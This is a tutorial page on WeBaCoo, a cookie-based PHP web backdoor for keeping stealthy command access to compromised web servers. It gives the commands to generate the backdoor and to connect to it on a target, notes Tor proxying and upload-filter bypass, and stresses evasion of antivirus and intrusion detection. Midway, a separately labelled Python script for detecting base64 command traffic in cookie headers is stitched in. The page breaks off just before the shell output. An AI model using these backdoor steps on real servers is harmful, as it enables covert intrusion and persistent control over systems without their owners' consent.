Introduction

WeBaCoo (Web Backdoor Cookie Script-Kit) aims to provide a stealthy, terminal-like connection over HTTP between a client and a web server. It is a post-exploitation tool for maintaining access to a compromised web server. WeBaCoo was designed to operate under the radar of modern, up-to-date AV, NIDS, IPS, network firewalls and application firewalls, providing a stealth mechanism for executing commands on the compromised server. The obfuscated communication is carried in the Cookie fields of the HTTP headers, inside valid client HTTP requests and the corresponding web server responses.

The project is available at: https://github.com/anestisb/WeBaCoo
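
For defenders, the Cookie-based channel described above can be hunted for in proxy or web-server header logs. The following is an added example, not part of WeBaCoo or of the original page: it flags Cookie and Set-Cookie values that base64-decode to readable text. It assumes the payload is base64-encoded; the record layout, cookie names and sample values are constructed.

```python
import base64
import binascii
import string
from urllib.parse import unquote

PRINTABLE = set(string.printable.encode())
MIN_LEN = 16          # skip short values such as "theme=dark"
MIN_PRINTABLE = 0.9   # decoded bytes must be almost entirely text

# Constructed sample header records (not captured traffic); names are hypothetical.
SAMPLE = [
    {"src": "198.51.100.7", "path": "/index.php",
     "cookie": "PHPSESSID=9f2c1a7be4d04c55a1b2; theme=dark"},
    {"src": "203.0.113.9", "path": "/uploads/avatar.php",
     "cookie": "sid=" + base64.b64encode(b"uname -a; id").decode(),
     "set_cookie": "sid=" + base64.b64encode(
         b"Linux web01 5.15.0 x86_64\nuid=33(www-data)").decode() + "; Path=/"},
]

def decode_text(value):
    """Return the decoded text if value is base64 of mostly printable bytes, else None."""
    value = unquote(value).strip('"')
    if len(value) < MIN_LEN:
        return None
    try:
        # Restore stripped padding, then decode strictly (rejects non-base64 characters).
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or sum(b in PRINTABLE for b in raw) / len(raw) < MIN_PRINTABLE:
        return None  # random session IDs decode to binary noise, not text
    return raw.decode("ascii", errors="replace")

def scan(records):
    """Return (src, path, header, cookie_name, decoded_text) for every suspicious value."""
    hits = []
    for rec in records:
        for header in ("cookie", "set_cookie"):
            for pair in rec.get(header, "").split(";"):
                name, _, value = pair.strip().partition("=")
                text = decode_text(value)
                if text is not None:
                    hits.append((rec["src"], rec["path"], header, name, text))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Applications that legitimately store base64-encoded text in cookies will also match, so triage hits by request path (for example, scripts under upload directories) and against a baseline of known cookie names.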

Usage:

Step 1: Create a backdoor

webacoo -g -f 1 -o security-training-share.php

Description of options:
-g – specifies the creation of a backdoor
-f – selects the system function used to execute commands:
system (default)
shell_exec
exec
passthru
popen
-o – specifies the name of the generated file

Step 2: Using a backdoor

Place the backdoor on the target machine to which we have access, then work with it through webacoo's command-line interface. To bypass blacklists, whitelists, and more when uploading the backdoor, please visit here.

webacoo -t -u http://url/backdoor.php -c M_cookie -p PROXY

Description of options:

-t – establishes a remote connection
-u – URL of the backdoor
-c – specifies the name of the cookie variable
-p – connects via a proxy, including the option of using the Tor network

We get the shell on the target machine with the help of our backdoor.php:
